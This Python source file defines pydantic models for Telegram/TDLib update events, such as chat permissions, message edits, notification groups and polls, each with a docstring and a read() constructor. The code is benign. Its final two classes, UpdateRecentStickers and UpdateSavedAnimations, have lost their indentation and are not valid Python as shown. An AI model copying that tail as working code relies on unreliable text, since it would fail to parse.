    ID: str = Field("updateChatOnlineMemberCount", alias="@type")
    chat_id: int
    online_member_count: int

    @staticmethod
    def read(q: dict) -> UpdateChatOnlineMemberCount:
        """Build an :class:`UpdateChatOnlineMemberCount` from the raw update dict *q*."""
        return UpdateChatOnlineMemberCount.construct(**q)
class UpdateChatPendingJoinRequests(Update):
    """
    The chat pending join requests were changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param pending_join_requests: The new data about pending join requests; may be null, defaults to None
    :type pending_join_requests: :class:`ChatJoinRequestsInfo`, optional

    """

    ID: str = Field("updateChatPendingJoinRequests", alias="@type")
    chat_id: int
    pending_join_requests: typing.Optional[ChatJoinRequestsInfo] = None

    @staticmethod
    def read(q: dict) -> UpdateChatPendingJoinRequests:
        """Build an :class:`UpdateChatPendingJoinRequests` from the raw update dict *q*."""
        return UpdateChatPendingJoinRequests.construct(**q)
class UpdateChatPermissions(Update):
    """
    Chat permissions was changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param permissions: The new chat permissions
    :type permissions: :class:`ChatPermissions`

    """

    ID: str = Field("updateChatPermissions", alias="@type")
    chat_id: int
    permissions: ChatPermissions

    @staticmethod
    def read(q: dict) -> UpdateChatPermissions:
        """Build an :class:`UpdateChatPermissions` from the raw update dict *q*."""
        return UpdateChatPermissions.construct(**q)
class UpdateChatPhoto(Update):
    """
    A chat photo was changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param photo: The new chat photo; may be null, defaults to None
    :type photo: :class:`ChatPhotoInfo`, optional

    """

    ID: str = Field("updateChatPhoto", alias="@type")
    chat_id: int
    photo: typing.Optional[ChatPhotoInfo] = None

    @staticmethod
    def read(q: dict) -> UpdateChatPhoto:
        """Build an :class:`UpdateChatPhoto` from the raw update dict *q*."""
        return UpdateChatPhoto.construct(**q)
class UpdateChatPosition(Update):
    """
    The position of a chat in a chat list has changed. Instead of this update updateChatLastMessage or updateChatDraftMessage might be sent

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param position: New chat position. If new order is 0, then the chat needs to be removed from the list
    :type position: :class:`ChatPosition`

    """

    ID: str = Field("updateChatPosition", alias="@type")
    chat_id: int
    position: ChatPosition

    @staticmethod
    def read(q: dict) -> UpdateChatPosition:
        """Build an :class:`UpdateChatPosition` from the raw update dict *q*."""
        return UpdateChatPosition.construct(**q)
class UpdateChatReadInbox(Update):
    """
    Incoming messages were read or the number of unread messages has been changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param last_read_inbox_message_id: Identifier of the last read incoming message
    :type last_read_inbox_message_id: :class:`int`

    :param unread_count: The number of unread messages left in the chat
    :type unread_count: :class:`int`

    """

    ID: str = Field("updateChatReadInbox", alias="@type")
    chat_id: int
    last_read_inbox_message_id: int
    unread_count: int

    @staticmethod
    def read(q: dict) -> UpdateChatReadInbox:
        """Build an :class:`UpdateChatReadInbox` from the raw update dict *q*."""
        return UpdateChatReadInbox.construct(**q)
class UpdateChatReadOutbox(Update):
    """
    Outgoing messages were read

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param last_read_outbox_message_id: Identifier of last read outgoing message
    :type last_read_outbox_message_id: :class:`int`

    """

    ID: str = Field("updateChatReadOutbox", alias="@type")
    chat_id: int
    last_read_outbox_message_id: int

    @staticmethod
    def read(q: dict) -> UpdateChatReadOutbox:
        """Build an :class:`UpdateChatReadOutbox` from the raw update dict *q*."""
        return UpdateChatReadOutbox.construct(**q)
class UpdateChatReplyMarkup(Update):
    """
    The default chat reply markup was changed. Can occur because new messages with reply markup were received or because an old reply markup was hidden by the user

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param reply_markup_message_id: Identifier of the message from which reply markup needs to be used; 0 if there is no default custom reply markup in the chat
    :type reply_markup_message_id: :class:`int`

    """

    ID: str = Field("updateChatReplyMarkup", alias="@type")
    chat_id: int
    reply_markup_message_id: int

    @staticmethod
    def read(q: dict) -> UpdateChatReplyMarkup:
        """Build an :class:`UpdateChatReplyMarkup` from the raw update dict *q*."""
        return UpdateChatReplyMarkup.construct(**q)
class UpdateChatTheme(Update):
    """
    The chat theme was changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param theme_name: The new name of the chat theme; may be empty if theme was reset to default
    :type theme_name: :class:`str`

    """

    ID: str = Field("updateChatTheme", alias="@type")
    chat_id: int
    theme_name: str

    @staticmethod
    def read(q: dict) -> UpdateChatTheme:
        """Build an :class:`UpdateChatTheme` from the raw update dict *q*."""
        return UpdateChatTheme.construct(**q)
class UpdateChatThemes(Update):
    """
    The list of available chat themes has changed

    :param chat_themes: The new list of chat themes
    :type chat_themes: :class:`list[ChatTheme]`

    """

    ID: str = Field("updateChatThemes", alias="@type")
    chat_themes: list[ChatTheme]

    @staticmethod
    def read(q: dict) -> UpdateChatThemes:
        """Build an :class:`UpdateChatThemes` from the raw update dict *q*."""
        return UpdateChatThemes.construct(**q)
class UpdateChatTitle(Update):
    """
    The title of a chat was changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param title: The new chat title
    :type title: :class:`str`

    """

    ID: str = Field("updateChatTitle", alias="@type")
    chat_id: int
    title: str

    @staticmethod
    def read(q: dict) -> UpdateChatTitle:
        """Build an :class:`UpdateChatTitle` from the raw update dict *q*."""
        return UpdateChatTitle.construct(**q)
class UpdateChatUnreadMentionCount(Update):
    """
    The chat unread_mention_count has changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param unread_mention_count: The number of unread mention messages left in the chat
    :type unread_mention_count: :class:`int`

    """

    ID: str = Field("updateChatUnreadMentionCount", alias="@type")
    chat_id: int
    unread_mention_count: int

    @staticmethod
    def read(q: dict) -> UpdateChatUnreadMentionCount:
        """Build an :class:`UpdateChatUnreadMentionCount` from the raw update dict *q*."""
        return UpdateChatUnreadMentionCount.construct(**q)
class UpdateChatVideoChat(Update):
    """
    A chat video chat state has changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param video_chat: New value of video_chat
    :type video_chat: :class:`VideoChat`

    """

    ID: str = Field("updateChatVideoChat", alias="@type")
    chat_id: int
    video_chat: VideoChat

    @staticmethod
    def read(q: dict) -> UpdateChatVideoChat:
        """Build an :class:`UpdateChatVideoChat` from the raw update dict *q*."""
        return UpdateChatVideoChat.construct(**q)
class UpdateConnectionState(Update):
    """
    The connection state has changed. This update must be used only to show a human-readable description of the connection state

    :param state: The new connection state
    :type state: :class:`ConnectionState`

    """

    ID: str = Field("updateConnectionState", alias="@type")
    state: ConnectionState

    @staticmethod
    def read(q: dict) -> UpdateConnectionState:
        """Build an :class:`UpdateConnectionState` from the raw update dict *q*."""
        return UpdateConnectionState.construct(**q)
class UpdateDeleteMessages(Update):
    """
    Some messages were deleted

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param message_ids: Identifiers of the deleted messages
    :type message_ids: :class:`list[int]`

    :param is_permanent: True, if the messages are permanently deleted by a user (as opposed to just becoming inaccessible)
    :type is_permanent: :class:`bool`

    :param from_cache: True, if the messages are deleted only from the cache and can possibly be retrieved again in the future
    :type from_cache: :class:`bool`

    """

    ID: str = Field("updateDeleteMessages", alias="@type")
    chat_id: int
    message_ids: list[int]
    is_permanent: bool
    from_cache: bool

    @staticmethod
    def read(q: dict) -> UpdateDeleteMessages:
        """Build an :class:`UpdateDeleteMessages` from the raw update dict *q*."""
        return UpdateDeleteMessages.construct(**q)
class UpdateDiceEmojis(Update):
    """
    The list of supported dice emojis has changed

    :param emojis: The new list of supported dice emojis
    :type emojis: :class:`list[str]`

    """

    ID: str = Field("updateDiceEmojis", alias="@type")
    emojis: list[str]

    @staticmethod
    def read(q: dict) -> UpdateDiceEmojis:
        """Build an :class:`UpdateDiceEmojis` from the raw update dict *q*."""
        return UpdateDiceEmojis.construct(**q)
class UpdateFavoriteStickers(Update):
    """
    The list of favorite stickers was updated

    :param sticker_ids: The new list of file identifiers of favorite stickers
    :type sticker_ids: :class:`list[int]`

    """

    ID: str = Field("updateFavoriteStickers", alias="@type")
    sticker_ids: list[int]

    @staticmethod
    def read(q: dict) -> UpdateFavoriteStickers:
        """Build an :class:`UpdateFavoriteStickers` from the raw update dict *q*."""
        return UpdateFavoriteStickers.construct(**q)
class UpdateFile(Update):
    """
    Information about a file was updated

    :param file: New data about the file
    :type file: :class:`File`

    """

    ID: str = Field("updateFile", alias="@type")
    file: File

    @staticmethod
    def read(q: dict) -> UpdateFile:
        """Build an :class:`UpdateFile` from the raw update dict *q*."""
        return UpdateFile.construct(**q)
class UpdateFileGenerationStart(Update):
    """
    The file generation process needs to be started by the application

    :param generation_id: Unique identifier for the generation process
    :type generation_id: :class:`int`

    :param original_path: The path to a file from which a new file is generated; may be empty
    :type original_path: :class:`str`

    :param destination_path: The path to a file that must be created and where the new file is generated
    :type destination_path: :class:`str`

    :param conversion: String specifying the conversion applied to the original file. If conversion is "#url#" than original_path contains an HTTP/HTTPS URL of a file, which must be downloaded by the application
    :type conversion: :class:`str`

    """

    ID: str = Field("updateFileGenerationStart", alias="@type")
    generation_id: int
    original_path: str
    destination_path: str
    conversion: str

    @staticmethod
    def read(q: dict) -> UpdateFileGenerationStart:
        """Build an :class:`UpdateFileGenerationStart` from the raw update dict *q*."""
        return UpdateFileGenerationStart.construct(**q)
class UpdateFileGenerationStop(Update):
    """
    File generation is no longer needed

    :param generation_id: Unique identifier for the generation process
    :type generation_id: :class:`int`

    """

    ID: str = Field("updateFileGenerationStop", alias="@type")
    generation_id: int

    @staticmethod
    def read(q: dict) -> UpdateFileGenerationStop:
        """Build an :class:`UpdateFileGenerationStop` from the raw update dict *q*."""
        return UpdateFileGenerationStop.construct(**q)
class UpdateGroupCall(Update):
    """
    Information about a group call was updated

    :param group_call: New data about a group call
    :type group_call: :class:`GroupCall`

    """

    ID: str = Field("updateGroupCall", alias="@type")
    group_call: GroupCall

    @staticmethod
    def read(q: dict) -> UpdateGroupCall:
        """Build an :class:`UpdateGroupCall` from the raw update dict *q*."""
        return UpdateGroupCall.construct(**q)
class UpdateGroupCallParticipant(Update):
    """
    Information about a group call participant was changed. The updates are sent only after the group call is received through getGroupCall and only if the call is joined or being joined

    :param group_call_id: Identifier of group call
    :type group_call_id: :class:`int`

    :param participant: New data about a participant
    :type participant: :class:`GroupCallParticipant`

    """

    ID: str = Field("updateGroupCallParticipant", alias="@type")
    group_call_id: int
    participant: GroupCallParticipant

    @staticmethod
    def read(q: dict) -> UpdateGroupCallParticipant:
        """Build an :class:`UpdateGroupCallParticipant` from the raw update dict *q*."""
        return UpdateGroupCallParticipant.construct(**q)
class UpdateHavePendingNotifications(Update):
    """
    Describes whether there are some pending notification updates. Can be used to prevent application from killing, while there are some pending notifications

    :param have_delayed_notifications: True, if there are some delayed notification updates, which will be sent soon
    :type have_delayed_notifications: :class:`bool`

    :param have_unreceived_notifications: True, if there can be some yet unreceived notifications, which are being fetched from the server
    :type have_unreceived_notifications: :class:`bool`

    """

    ID: str = Field("updateHavePendingNotifications", alias="@type")
    have_delayed_notifications: bool
    have_unreceived_notifications: bool

    @staticmethod
    def read(q: dict) -> UpdateHavePendingNotifications:
        """Build an :class:`UpdateHavePendingNotifications` from the raw update dict *q*."""
        return UpdateHavePendingNotifications.construct(**q)
class UpdateInstalledStickerSets(Update):
    """
    The list of installed sticker sets was updated

    :param is_masks: True, if the list of installed mask sticker sets was updated
    :type is_masks: :class:`bool`

    :param sticker_set_ids: The new list of installed ordinary sticker sets
    :type sticker_set_ids: :class:`list[int]`

    """

    ID: str = Field("updateInstalledStickerSets", alias="@type")
    is_masks: bool
    sticker_set_ids: list[int]

    @staticmethod
    def read(q: dict) -> UpdateInstalledStickerSets:
        """Build an :class:`UpdateInstalledStickerSets` from the raw update dict *q*."""
        return UpdateInstalledStickerSets.construct(**q)
class UpdateLanguagePackStrings(Update):
    """
    Some language pack strings have been updated

    :param localization_target: Localization target to which the language pack belongs
    :type localization_target: :class:`str`

    :param language_pack_id: Identifier of the updated language pack
    :type language_pack_id: :class:`str`

    :param strings: List of changed language pack strings
    :type strings: :class:`list[LanguagePackString]`

    """

    ID: str = Field("updateLanguagePackStrings", alias="@type")
    localization_target: str
    language_pack_id: str
    strings: list[LanguagePackString]

    @staticmethod
    def read(q: dict) -> UpdateLanguagePackStrings:
        """Build an :class:`UpdateLanguagePackStrings` from the raw update dict *q*."""
        return UpdateLanguagePackStrings.construct(**q)
class UpdateMessageContent(Update):
    """
    The message content has changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param message_id: Message identifier
    :type message_id: :class:`int`

    :param new_content: New message content
    :type new_content: :class:`MessageContent`

    """

    ID: str = Field("updateMessageContent", alias="@type")
    chat_id: int
    message_id: int
    new_content: MessageContent

    @staticmethod
    def read(q: dict) -> UpdateMessageContent:
        """Build an :class:`UpdateMessageContent` from the raw update dict *q*."""
        return UpdateMessageContent.construct(**q)
class UpdateMessageContentOpened(Update):
    """
    The message content was opened. Updates voice note messages to "listened", video note messages to "viewed" and starts the TTL timer for self-destructing messages

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param message_id: Message identifier
    :type message_id: :class:`int`

    """

    ID: str = Field("updateMessageContentOpened", alias="@type")
    chat_id: int
    message_id: int

    @staticmethod
    def read(q: dict) -> UpdateMessageContentOpened:
        """Build an :class:`UpdateMessageContentOpened` from the raw update dict *q*."""
        return UpdateMessageContentOpened.construct(**q)
class UpdateMessageEdited(Update):
    """
    A message was edited. Changes in the message content will come in a separate updateMessageContent

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param message_id: Message identifier
    :type message_id: :class:`int`

    :param edit_date: Point in time (Unix timestamp) when the message was edited
    :type edit_date: :class:`int`

    :param reply_markup: New message reply markup; may be null, defaults to None
    :type reply_markup: :class:`ReplyMarkup`, optional

    """

    ID: str = Field("updateMessageEdited", alias="@type")
    chat_id: int
    message_id: int
    edit_date: int
    reply_markup: typing.Optional[ReplyMarkup] = None

    @staticmethod
    def read(q: dict) -> UpdateMessageEdited:
        """Build an :class:`UpdateMessageEdited` from the raw update dict *q*."""
        return UpdateMessageEdited.construct(**q)
class UpdateMessageInteractionInfo(Update):
    """
    The information about interactions with a message has changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param message_id: Message identifier
    :type message_id: :class:`int`

    :param interaction_info: New information about interactions with the message; may be null, defaults to None
    :type interaction_info: :class:`MessageInteractionInfo`, optional

    """

    ID: str = Field("updateMessageInteractionInfo", alias="@type")
    chat_id: int
    message_id: int
    interaction_info: typing.Optional[MessageInteractionInfo] = None

    @staticmethod
    def read(q: dict) -> UpdateMessageInteractionInfo:
        """Build an :class:`UpdateMessageInteractionInfo` from the raw update dict *q*."""
        return UpdateMessageInteractionInfo.construct(**q)
class UpdateMessageIsPinned(Update):
    """
    The message pinned state was changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param message_id: The message identifier
    :type message_id: :class:`int`

    :param is_pinned: True, if the message is pinned
    :type is_pinned: :class:`bool`

    """

    ID: str = Field("updateMessageIsPinned", alias="@type")
    chat_id: int
    message_id: int
    is_pinned: bool

    @staticmethod
    def read(q: dict) -> UpdateMessageIsPinned:
        """Build an :class:`UpdateMessageIsPinned` from the raw update dict *q*."""
        return UpdateMessageIsPinned.construct(**q)
class UpdateMessageLiveLocationViewed(Update):
    """
    A message with a live location was viewed. When the update is received, the application is supposed to update the live location

    :param chat_id: Identifier of the chat with the live location message
    :type chat_id: :class:`int`

    :param message_id: Identifier of the message with live location
    :type message_id: :class:`int`

    """

    ID: str = Field("updateMessageLiveLocationViewed", alias="@type")
    chat_id: int
    message_id: int

    @staticmethod
    def read(q: dict) -> UpdateMessageLiveLocationViewed:
        """Build an :class:`UpdateMessageLiveLocationViewed` from the raw update dict *q*."""
        return UpdateMessageLiveLocationViewed.construct(**q)
class UpdateMessageMentionRead(Update):
    """
    A message with an unread mention was read

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param message_id: Message identifier
    :type message_id: :class:`int`

    :param unread_mention_count: The new number of unread mention messages left in the chat
    :type unread_mention_count: :class:`int`

    """

    ID: str = Field("updateMessageMentionRead", alias="@type")
    chat_id: int
    message_id: int
    unread_mention_count: int

    @staticmethod
    def read(q: dict) -> UpdateMessageMentionRead:
        """Build an :class:`UpdateMessageMentionRead` from the raw update dict *q*."""
        return UpdateMessageMentionRead.construct(**q)
class UpdateMessageSendAcknowledged(Update):
    """
    A request to send a message has reached the Telegram server. This doesn't mean that the message will be sent successfully or even that the send message request will be processed. This update will be sent only if the option "use_quick_ack" is set to true. This update may be sent multiple times for the same message

    :param chat_id: The chat identifier of the sent message
    :type chat_id: :class:`int`

    :param message_id: A temporary message identifier
    :type message_id: :class:`int`

    """

    ID: str = Field("updateMessageSendAcknowledged", alias="@type")
    chat_id: int
    message_id: int

    @staticmethod
    def read(q: dict) -> UpdateMessageSendAcknowledged:
        """Build an :class:`UpdateMessageSendAcknowledged` from the raw update dict *q*."""
        return UpdateMessageSendAcknowledged.construct(**q)
class UpdateMessageSendFailed(Update):
    """
    A message failed to send. Be aware that some messages being sent can be irrecoverably deleted, in which case updateDeleteMessages will be received instead of this update

    :param message: The failed to send message
    :type message: :class:`Message`

    :param old_message_id: The previous temporary message identifier
    :type old_message_id: :class:`int`

    :param error_code: An error code
    :type error_code: :class:`int`

    :param error_message: Error message
    :type error_message: :class:`str`

    """

    ID: str = Field("updateMessageSendFailed", alias="@type")
    message: Message
    old_message_id: int
    error_code: int
    error_message: str

    @staticmethod
    def read(q: dict) -> UpdateMessageSendFailed:
        """Build an :class:`UpdateMessageSendFailed` from the raw update dict *q*."""
        return UpdateMessageSendFailed.construct(**q)
class UpdateMessageSendSucceeded(Update):
    """
    A message has been successfully sent

    :param message: The sent message. Usually only the message identifier, date, and content are changed, but almost all other fields can also change
    :type message: :class:`Message`

    :param old_message_id: The previous temporary message identifier
    :type old_message_id: :class:`int`

    """

    ID: str = Field("updateMessageSendSucceeded", alias="@type")
    message: Message
    old_message_id: int

    @staticmethod
    def read(q: dict) -> UpdateMessageSendSucceeded:
        """Build an :class:`UpdateMessageSendSucceeded` from the raw update dict *q*."""
        return UpdateMessageSendSucceeded.construct(**q)
class UpdateNewCallSignalingData(Update):
    """
    New call signaling data arrived

    :param call_id: The call identifier
    :type call_id: :class:`int`

    :param data: The data
    :type data: :class:`str`

    """

    ID: str = Field("updateNewCallSignalingData", alias="@type")
    call_id: int
    data: str

    @staticmethod
    def read(q: dict) -> UpdateNewCallSignalingData:
        """Build an :class:`UpdateNewCallSignalingData` from the raw update dict *q*."""
        return UpdateNewCallSignalingData.construct(**q)
class UpdateNewCallbackQuery(Update):
    """
    A new incoming callback query; for bots only

    :param id: Unique query identifier
    :type id: :class:`int`

    :param sender_user_id: Identifier of the user who sent the query
    :type sender_user_id: :class:`int`

    :param chat_id: Identifier of the chat where the query was sent
    :type chat_id: :class:`int`

    :param message_id: Identifier of the message, from which the query originated
    :type message_id: :class:`int`

    :param chat_instance: Identifier that uniquely corresponds to the chat to which the message was sent
    :type chat_instance: :class:`int`

    :param payload: Query payload
    :type payload: :class:`CallbackQueryPayload`

    """

    ID: str = Field("updateNewCallbackQuery", alias="@type")
    id: int
    sender_user_id: int
    chat_id: int
    message_id: int
    chat_instance: int
    payload: CallbackQueryPayload

    @staticmethod
    def read(q: dict) -> UpdateNewCallbackQuery:
        """Build an :class:`UpdateNewCallbackQuery` from the raw update dict *q*."""
        return UpdateNewCallbackQuery.construct(**q)
class UpdateNewChat(Update):
    """
    A new chat has been loaded/created. This update is guaranteed to come before the chat identifier is returned to the application. The chat field changes will be reported through separate updates

    :param chat: The chat
    :type chat: :class:`Chat`

    """

    ID: str = Field("updateNewChat", alias="@type")
    chat: Chat

    @staticmethod
    def read(q: dict) -> UpdateNewChat:
        """Build an :class:`UpdateNewChat` from the raw update dict *q*."""
        return UpdateNewChat.construct(**q)
class UpdateNewChatJoinRequest(Update):
    """
    A user sent a join request to a chat; for bots only

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param request: Join request
    :type request: :class:`ChatJoinRequest`

    :param invite_link: The invite link, which was used to send join request; may be null, defaults to None
    :type invite_link: :class:`ChatInviteLink`, optional

    """

    ID: str = Field("updateNewChatJoinRequest", alias="@type")
    chat_id: int
    request: ChatJoinRequest
    invite_link: typing.Optional[ChatInviteLink] = None

    @staticmethod
    def read(q: dict) -> UpdateNewChatJoinRequest:
        """Build an :class:`UpdateNewChatJoinRequest` from the raw update dict *q*."""
        return UpdateNewChatJoinRequest.construct(**q)
class UpdateNewChosenInlineResult(Update):
    """
    The user has chosen a result of an inline query; for bots only

    :param sender_user_id: Identifier of the user who sent the query
    :type sender_user_id: :class:`int`

    :param user_location: User location; may be null, defaults to None
    :type user_location: :class:`Location`, optional

    :param query: Text of the query
    :type query: :class:`str`

    :param result_id: Identifier of the chosen result
    :type result_id: :class:`str`

    :param inline_message_id: Identifier of the sent inline message, if known
    :type inline_message_id: :class:`str`

    """

    ID: str = Field("updateNewChosenInlineResult", alias="@type")
    sender_user_id: int
    user_location: typing.Optional[Location] = None
    query: str
    result_id: str
    inline_message_id: str

    @staticmethod
    def read(q: dict) -> UpdateNewChosenInlineResult:
        """Build an :class:`UpdateNewChosenInlineResult` from the raw update dict *q*."""
        return UpdateNewChosenInlineResult.construct(**q)
class UpdateNewCustomEvent(Update):
    """
    A new incoming event; for bots only

    :param event: A JSON-serialized event
    :type event: :class:`str`

    """

    ID: str = Field("updateNewCustomEvent", alias="@type")
    event: str

    @staticmethod
    def read(q: dict) -> UpdateNewCustomEvent:
        """Build an :class:`UpdateNewCustomEvent` from the raw update dict *q*."""
        return UpdateNewCustomEvent.construct(**q)
class UpdateNewCustomQuery(Update):
    """
    A new incoming query; for bots only

    :param id: The query identifier
    :type id: :class:`int`

    :param data: JSON-serialized query data
    :type data: :class:`str`

    :param timeout: Query timeout
    :type timeout: :class:`int`

    """

    ID: str = Field("updateNewCustomQuery", alias="@type")
    id: int
    data: str
    timeout: int

    @staticmethod
    def read(q: dict) -> UpdateNewCustomQuery:
        """Build an :class:`UpdateNewCustomQuery` from the raw update dict *q*."""
        return UpdateNewCustomQuery.construct(**q)
class UpdateNewInlineCallbackQuery(Update):
    """
    A new incoming callback query from a message sent via a bot; for bots only

    :param id: Unique query identifier
    :type id: :class:`int`

    :param sender_user_id: Identifier of the user who sent the query
    :type sender_user_id: :class:`int`

    :param inline_message_id: Identifier of the inline message, from which the query originated
    :type inline_message_id: :class:`str`

    :param chat_instance: An identifier uniquely corresponding to the chat a message was sent to
    :type chat_instance: :class:`int`

    :param payload: Query payload
    :type payload: :class:`CallbackQueryPayload`

    """

    ID: str = Field("updateNewInlineCallbackQuery", alias="@type")
    id: int
    sender_user_id: int
    inline_message_id: str
    chat_instance: int
    payload: CallbackQueryPayload

    @staticmethod
    def read(q: dict) -> UpdateNewInlineCallbackQuery:
        """Build an :class:`UpdateNewInlineCallbackQuery` from the raw update dict *q*."""
        return UpdateNewInlineCallbackQuery.construct(**q)
class UpdateNewInlineQuery(Update):
    """
    A new incoming inline query; for bots only

    :param id: Unique query identifier
    :type id: :class:`int`

    :param sender_user_id: Identifier of the user who sent the query
    :type sender_user_id: :class:`int`

    :param user_location: User location; may be null, defaults to None
    :type user_location: :class:`Location`, optional

    :param chat_type: The type of the chat, from which the query originated; may be null if unknown, defaults to None
    :type chat_type: :class:`ChatType`, optional

    :param query: Text of the query
    :type query: :class:`str`

    :param offset: Offset of the first entry to return
    :type offset: :class:`str`

    """

    ID: str = Field("updateNewInlineQuery", alias="@type")
    id: int
    sender_user_id: int
    user_location: typing.Optional[Location] = None
    chat_type: typing.Optional[ChatType] = None
    query: str
    offset: str

    @staticmethod
    def read(q: dict) -> UpdateNewInlineQuery:
        """Build an :class:`UpdateNewInlineQuery` from the raw update dict *q*."""
        return UpdateNewInlineQuery.construct(**q)
class UpdateNewMessage(Update):
    """
    A new message was received; can also be an outgoing message

    :param message: The new message
    :type message: :class:`Message`

    """

    ID: str = Field("updateNewMessage", alias="@type")
    message: Message

    @staticmethod
    def read(q: dict) -> UpdateNewMessage:
        """Build an :class:`UpdateNewMessage` from the raw update dict *q*."""
        return UpdateNewMessage.construct(**q)
class UpdateNewPreCheckoutQuery(Update):
    """
    A new incoming pre-checkout query; for bots only. Contains full information about a checkout

    :param id: Unique query identifier
    :type id: :class:`int`

    :param sender_user_id: Identifier of the user who sent the query
    :type sender_user_id: :class:`int`

    :param currency: Currency for the product price
    :type currency: :class:`str`

    :param total_amount: Total price for the product, in the smallest units of the currency
    :type total_amount: :class:`int`

    :param invoice_payload: Invoice payload
    :type invoice_payload: :class:`str`

    :param shipping_option_id: Identifier of a shipping option chosen by the user; may be empty if not applicable
    :type shipping_option_id: :class:`str`

    :param order_info: Information about the order; may be null, defaults to None
    :type order_info: :class:`OrderInfo`, optional

    """

    ID: str = Field("updateNewPreCheckoutQuery", alias="@type")
    id: int
    sender_user_id: int
    currency: str
    total_amount: int
    invoice_payload: str
    shipping_option_id: str
    order_info: typing.Optional[OrderInfo] = None

    @staticmethod
    def read(q: dict) -> UpdateNewPreCheckoutQuery:
        """Build an :class:`UpdateNewPreCheckoutQuery` from the raw update dict *q*."""
        return UpdateNewPreCheckoutQuery.construct(**q)
class UpdateNewShippingQuery(Update):
    """
    A new incoming shipping query; for bots only. Only for invoices with flexible price

    :param id: Unique query identifier
    :type id: :class:`int`

    :param sender_user_id: Identifier of the user who sent the query
    :type sender_user_id: :class:`int`

    :param invoice_payload: Invoice payload
    :type invoice_payload: :class:`str`

    :param shipping_address: User shipping address
    :type shipping_address: :class:`Address`

    """

    ID: str = Field("updateNewShippingQuery", alias="@type")
    id: int
    sender_user_id: int
    invoice_payload: str
    shipping_address: Address

    @staticmethod
    def read(q: dict) -> UpdateNewShippingQuery:
        """Build an :class:`UpdateNewShippingQuery` from the raw update dict *q*."""
        return UpdateNewShippingQuery.construct(**q)
class UpdateNotification(Update):
    """
    A notification was changed

    :param notification_group_id: Unique notification group identifier
    :type notification_group_id: :class:`int`

    :param notification: Changed notification
    :type notification: :class:`Notification`

    """

    ID: str = Field("updateNotification", alias="@type")
    notification_group_id: int
    notification: Notification

    @staticmethod
    def read(q: dict) -> UpdateNotification:
        """Build an :class:`UpdateNotification` from the raw update dict *q*."""
        return UpdateNotification.construct(**q)
class UpdateNotificationGroup(Update):
    """
    A list of active notifications in a notification group has changed

    :param notification_group_id: Unique notification group identifier
    :type notification_group_id: :class:`int`

    :param type_: New type of the notification group
    :type type_: :class:`NotificationGroupType`

    :param chat_id: Identifier of a chat to which all notifications in the group belong
    :type chat_id: :class:`int`

    :param notification_settings_chat_id: Chat identifier, which notification settings must be applied to the added notifications
    :type notification_settings_chat_id: :class:`int`

    :param is_silent: True, if the notifications must be shown without sound
    :type is_silent: :class:`bool`

    :param total_count: Total number of unread notifications in the group, can be bigger than number of active notifications
    :type total_count: :class:`int`

    :param added_notifications: List of added group notifications, sorted by notification ID
    :type added_notifications: :class:`list[Notification]`

    :param removed_notification_ids: Identifiers of removed group notifications, sorted by notification ID
    :type removed_notification_ids: :class:`list[int]`

    """

    ID: str = Field("updateNotificationGroup", alias="@type")
    notification_group_id: int
    # Aliased because "type" would shadow the builtin; wire key remains "type".
    type_: NotificationGroupType = Field(..., alias='type')
    chat_id: int
    notification_settings_chat_id: int
    is_silent: bool
    total_count: int
    added_notifications: list[Notification]
    removed_notification_ids: list[int]

    @staticmethod
    def read(q: dict) -> UpdateNotificationGroup:
        """Build an :class:`UpdateNotificationGroup` from the raw update dict *q*."""
        return UpdateNotificationGroup.construct(**q)
class UpdateOption(Update):
    """
    An option changed its value

    :param name: The option name
    :type name: :class:`str`

    :param value: The new option value
    :type value: :class:`OptionValue`

    """

    ID: str = Field("updateOption", alias="@type")
    name: str
    value: OptionValue

    @staticmethod
    def read(q: dict) -> UpdateOption:
        """Build an :class:`UpdateOption` from the raw update dict *q*."""
        return UpdateOption.construct(**q)
class UpdatePoll(Update):
    """
    A poll was updated; for bots only

    :param poll: New data about the poll
    :type poll: :class:`Poll`

    """

    ID: str = Field("updatePoll", alias="@type")
    poll: Poll

    @staticmethod
    def read(q: dict) -> UpdatePoll:
        """Build an :class:`UpdatePoll` from the raw update dict *q*."""
        return UpdatePoll.construct(**q)
class UpdatePollAnswer(Update):
    """
    A user changed the answer to a poll; for bots only

    :param poll_id: Unique poll identifier
    :type poll_id: :class:`int`

    :param user_id: The user, who changed the answer to the poll
    :type user_id: :class:`int`

    :param option_ids: 0-based identifiers of answer options, chosen by the user
    :type option_ids: :class:`list[int]`

    """

    ID: str = Field("updatePollAnswer", alias="@type")
    poll_id: int
    user_id: int
    option_ids: list[int]

    @staticmethod
    def read(q: dict) -> UpdatePollAnswer:
        """Build an :class:`UpdatePollAnswer` from the raw update dict *q*."""
        return UpdatePollAnswer.construct(**q)
class UpdateRecentStickers(Update):
"""
The list of recently used stickers was updated
:param is_attached: True, if the list of stickers attached to photo or video files was updated, otherwise the list of sent stickers is updated
:type is_attached: :class:`bool`
:param sticker_ids: The new list of file identifiers of recently used stickers
:type sticker_ids: :class:`list[int]`
"""
ID: str = Field("updateRecentStickers", alias="@type")
is_attached: bool
sticker_ids: list[int]
@staticmethod
def read(q: dict) -> UpdateRecentStickers:
return UpdateRecentStickers.construct(**q)
class UpdateSavedAnimations(Update):
"""
The list of saved animations was updated
:param animation_ids: The new list of file identifiers of saved animations
:type animation_ids: :class:`list[int]`
"""
ID: str = Field("updateSavedAnimations", alias="@type")
animation_ids: list[int]
@staticmethod
def read(q: dict) -> UpdateSavedAnimations:
return UpdateSavedAnimations.construct(**q)
